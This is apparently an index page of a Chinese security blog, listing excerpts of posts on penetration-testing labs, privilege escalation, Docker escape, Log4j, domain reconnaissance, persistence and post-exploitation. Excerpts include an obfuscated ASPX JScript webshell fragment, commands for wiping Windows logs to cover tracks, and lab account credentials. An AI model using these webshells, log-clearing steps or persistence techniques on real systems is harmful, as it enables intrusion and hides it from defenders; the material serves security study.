摘要:
1、XP_cmdshell提权 xp_cmdshell 在 mssql2000 中是默认开启的,在 mssql2005 之后的版本中默认禁止。 如果拥有管理员 sa 权限,则可以用 sp_configure 重新开启它。 启用xp_cmdshell: EXEC sp_configure 'show 阅读全文
posted @ 2023-03-23 22:53
hello_bao
阅读(428)
评论(0)
推荐(0)
摘要:
如果是 物理机运行虚拟机,虚拟机运行Docker容器 的情况,还要进行 虚拟机逃逸。 Docker 逃逸的原因可以划分为三种: 由内核漏洞引起 ——Dirty COW(CVE-2016-5195) 由 Docker 软件设计引起——CVE-2019-5736(runC )、CVE-2019-1427 阅读全文
posted @ 2023-03-23 21:48
hello_bao
阅读(2214)
评论(0)
推荐(0)
摘要:
1、漏洞原理 JNDI:Java Naming and Directory Interface(java命名和目录接口)。 LDAP:Lightweight Directory Access Protocol(轻型目录访问协议)。 RMI:Remote Method Invoke(远程方法调用)。 阅读全文
posted @ 2023-03-23 20:28
hello_bao
阅读(2621)
评论(0)
推荐(0)
摘要:
chcp 65001 #修改编码 ipconfig /all #查看网络信息 net config workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user /domain # 查看所有域用户 net view /domain # 查看有几个域 net 阅读全文
posted @ 2023-03-23 20:20
hello_bao
阅读(41)
评论(0)
推荐(0)
摘要:
最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除 Windows系统: 1:用MSF中的 clearev 命令清除痕迹 2:执行命令清除日志: del %WINDR%\* .log /a/s/q/f 3、全量清理,windows主机三大核心【系统、安全、应用程序】日志清理 PowerShell - 阅读全文
posted @ 2023-03-23 13:54
hello_bao
阅读(855)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->sql注入漏洞-->后台文件上传漏洞getshell 下载hdh cms源码,收集信息。注册admin用户,验证用户存在。search.aspx存在sql注入漏洞,MDB Viewer打开数据库,sqlmap设置tamper=randomcase过waf,根据表结构 阅读全文
posted @ 2023-03-23 13:44
hello_bao
阅读(1319)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->sql注入漏洞-->后台配置getshell-->宝塔面板执行后门,上线msf 查看网页源代码,下载cms源码,本地搭建测试环境,熟悉数据库表结构,代码审计,发现sql注入漏洞,sqlmap根据表结构暴破账号密码并解密。 登录后台,本地测试,后台配置文件写shell 阅读全文
posted @ 2023-03-23 13:43
hello_bao
阅读(815)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->登录后台getshell 通过ChangeLog.txt查看cms版本,gobuster扫描tar.gz备份文件或者扫描php~隐藏文件(隐藏文件不被解析,可获得源码),获取database.php里的db配置路径。下载db,破解密码hash,登陆后台。利用file 阅读全文
posted @ 2023-03-23 13:43
hello_bao
阅读(574)
评论(0)
推荐(0)
摘要:
1、Fiddler设置选项后需要重启生效 2、adb 命令使用 adb root adb remount adb pull /system/etc/hosts 192.168.1.103 www.app10.com 保存到hosts文件,最后保留一空行 adb push hosts /system/ 阅读全文
posted @ 2023-03-23 13:43
hello_bao
阅读(114)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->漏洞挖掘-->getshell masscan 降低速度扫描端口,nmap详细扫描。先访问rebots.txt,得到siteserver目录,在编写目录扫描工具,搜索siteserver cms sql注入漏洞,获取管理员账号密码。或者密码找回漏洞(burp答案置空 阅读全文
posted @ 2023-03-23 13:43
hello_bao
阅读(1084)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->敏感文件泄漏-->后台getshell nmap扫描端口,gobuster扫描目录,未发现后台,发现.svn文件,利用svn源代码泄漏工具 未成功,访问.svn/wc.db固定文件,发现存储网站目录结构,发现日志路径,编写thinkphp日志泄漏工具读取日志内容,发 阅读全文
posted @ 2023-03-23 13:42
hello_bao
阅读(936)
评论(0)
推荐(0)
摘要:
账号、密码: moonsec yanisy123 moon moonQWE123 渗透过程概述: 1、信息收集-->二次编码注入漏洞挖掘 masscan、nmap扫描端口,gobuster扫描目录,过滤Size,(网站有防护,其他工具扫永远返回200),search?keyword=11' 二次编码 阅读全文
posted @ 2023-03-23 13:42
hello_bao
阅读(1797)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->getshell-->上线msf: 旁站(new.cc123)入侵,扫目录,获取cms版本号,发现该版本有(cookie)sql注入漏洞,利用exp获得密码hash,解密,登陆后台,上传小马,菜刀蚁剑连接,发现终端低权限。 上传大马+wt.asp,扫描可执行目录,上 阅读全文
posted @ 2023-03-23 13:42
hello_bao
阅读(2821)
评论(0)
推荐(0)
摘要:
Administrator SUN.COM dc123.com leo SUN.COM 123.com admin SUN.COM 2022.com 渗透过程概述: 1、信息收集 1.1 端口扫描 2、漏洞挖掘【thinkphp漏洞收集】 2.1 访问不存在的网页地址,发现thinkphp版本号 h 阅读全文
posted @ 2023-03-23 13:41
hello_bao
阅读(328)
评论(0)
推荐(0)
摘要:
【密码: ubuntu1:web web2021 ubuntu2:ubuntu ubuntu win7_1:bunny Bunny2021 win7_2:moretz Moretz2021 dc:Administrator Whoami2021 】 【ip: 本机: 192.168.1.101 ka 阅读全文
posted @ 2023-03-23 13:41
hello_bao
阅读(1529)
评论(0)
推荐(0)
摘要:
ubuntu:ubuntu 域成员机器: douser:Dotest123 DC:administrator:Test2008. 渗透过程概述: 1、信息收集-->Tomcat任意文件写入漏洞getshell-->struts远程命令执行漏洞,直接上线msf 端口扫描,tomcat CVE-2017 阅读全文
posted @ 2023-03-23 13:40
hello_bao
阅读(1065)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->敏感文件泄漏-->登录后台,修改模版getshell wappalyzer识别joomla cms,JoomlaScan扫描路径和敏感文件,发现后台和配置文件configuration.php~,获取mysql连接信息并连接,从官网途径获取添加管理员的方法,登录后台 阅读全文
posted @ 2023-03-23 13:40
hello_bao
阅读(1335)
评论(0)
推荐(0)
摘要:
账号 密码 de1ay\administrator !@#QWEasd123 de1ay\mssql 1qaz@WSX de1ay\de1ay 1qaz@WSX 渗透过程概述: weblogicScanner.py 收集weblogic漏洞信息,Java反序列化漏洞利用工具V1.7 getshell 阅读全文
posted @ 2023-03-23 13:40
hello_bao
阅读(147)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->phpmyadmin日志写shell,上线msf,提权 端口扫描,root/root弱口令登录mysql,登录phpmyadmin,利用日志文件写shell。蚁剑连接,反弹shell上线msf,添加路由。 2、内网渗透-->域控 永恒之蓝,ms17_010_comm 阅读全文
posted @ 2023-03-23 13:39
hello_bao
阅读(91)
评论(0)
推荐(0)
摘要:
1、nmap -sC -sT -sV -A -O 192.168.1.103 2、dirb http://192.168.1.103 -X .php .html 递归扫描目录文件,-X参数过滤403 3、http://192.168.1.103/test.php?file=last.html 文件包 阅读全文
posted @ 2023-03-23 13:39
hello_bao
阅读(30)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->Logj2漏洞利用getshell-->docker逃逸失败 利用dnsLog验证log4j2漏洞,kali开启http和ladp服务,构造bash一句话payload,连接nc。验证docker环境,利用runC漏洞和特权模式 都逃逸失败了。 2、内网渗透-->域 阅读全文
posted @ 2023-03-23 13:38
hello_bao
阅读(511)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->weblogic反序列化漏洞getshell-->上线msf,提权 登录页发现weblogic版本信息,利用其反序列化漏洞,上线msf,提权,获取hash。 2、内网渗透-->sql server数据库服务器-->dc 利用永恒之蓝,win7上线msf,为保持稳定m 阅读全文
posted @ 2023-03-23 13:37
hello_bao
阅读(1933)
评论(0)
推荐(0)
摘要:
进程迁移: ps 获取进程 getpid shell的进程号 migrate 迁移 run post/windows/manage/migrate 自动迁移 shell之后: sysinfo 获取系统信息 run post/windows/gather/checkvm 查看目标是否允许在虚拟机 id 阅读全文
posted @ 2023-03-23 13:32
hello_bao
阅读(192)
评论(0)
推荐(0)
摘要:
1、下载插件和服务代码 地址: https://github.com/f0ng/captcha-killer-modified/releases 该项目基于captcha-killer(https://github.com/c0ny1/captcha-killer)修改,可以用于2021-2022的 阅读全文
posted @ 2023-03-23 13:31
hello_bao
阅读(997)
评论(1)
推荐(0)
摘要:
<%@ Page Language="Jscript" Debug=true%> <% var SE=Request.Form["1"]; var SMQ="unsa",FWJVPDC="fe",PZEGHR=SMQ+FWJVPDC; function AJHB() { return SE; } f 阅读全文
posted @ 2023-03-23 13:20
hello_bao
阅读(1081)
评论(0)
推荐(0)
摘要:
1、常见端口/服务漏洞列表汇总 2、反序列化漏洞的原理 在反序列化unserialize()时存在用户可控参数,而反序列化会自动调用一些魔术方法,如果魔术方法内 存在一些敏感操作例如eval()函数,而且参数是通过反序列化产生的,那么用户就可以通过改变参数来执行敏感操作。 3、xxe漏洞的原理 允许 阅读全文
posted @ 2023-03-23 13:19
hello_bao
阅读(223)
评论(0)
推荐(0)
摘要:
1、webshell后门 2、系统计划任务 3、注册表利用 4、PowerShell权限维持 5、不死马、内存马 6、进程劫持 7、端口转发、启动项提权、dll劫持、添加Rookit后门 8、Docker逃逸 9、蜜罐诱捕 10、映像劫持 策略组脚本维持 shift 后门 11、建立影子账号 pow 阅读全文
posted @ 2023-03-23 13:18
hello_bao
阅读(55)
评论(0)
推荐(0)
摘要:
1、UDF提权 udf:User Define Function,用户自定义函数 通过编写调用cmd或者shell的udf.dll文件,并且导入到一个指定的文件夹下,创建一个指向udf.dll的自定义函数,使在数据库中的查询 等价于在cmd或者shell中执行命令。 linux 后缀.so,wind 阅读全文
posted @ 2023-03-23 13:14
hello_bao
阅读(615)
评论(0)
推荐(0)
摘要:
1、内核溢出提权 脏牛提权 2、suid提权 3、sudo提权 4、awk提权 5、ed提权 6、find提权 7、env环境变量劫持提权 8、less、more、man提权 9、expect提权 10、perl提权 11、ssh 密钥提权 12、scp提权 13、vi提权 14、tclsh提权 1 阅读全文
posted @ 2023-03-23 13:13
hello_bao
阅读(163)
评论(0)
推荐(0)
摘要:
1、内核溢出漏洞提权 2、错误的系统配置提权 系统服务 权限配置错误 提权 不带引号提权 注册键 AlwaysInstallElevated 提权 自动安装配置文件提权 3、组策略首选项提权 4、dll劫持提权 5、第三方软件/服务提权 6、CVE-2020-0787 提权 7、CVE-2016-3 阅读全文
posted @ 2023-03-23 13:13
hello_bao
阅读(58)
评论(0)
推荐(1)
摘要:
1 进程分析工具 1.1 ProcessHacker 功能:ProcessHacker是一款不错的进程分析工具,可查看所有进程信息,包括进程加载的dll、进程打开的文件、进程读写的注册表……,也可以将特定进程的内存空间Dump到本地,此外还可以查看网络连接。 工具截图如下: 注:查看具体进程的详细信 阅读全文
posted @ 2023-03-23 13:09
hello_bao
阅读(459)
评论(0)
推荐(0)

浙公网安备 33010602011771号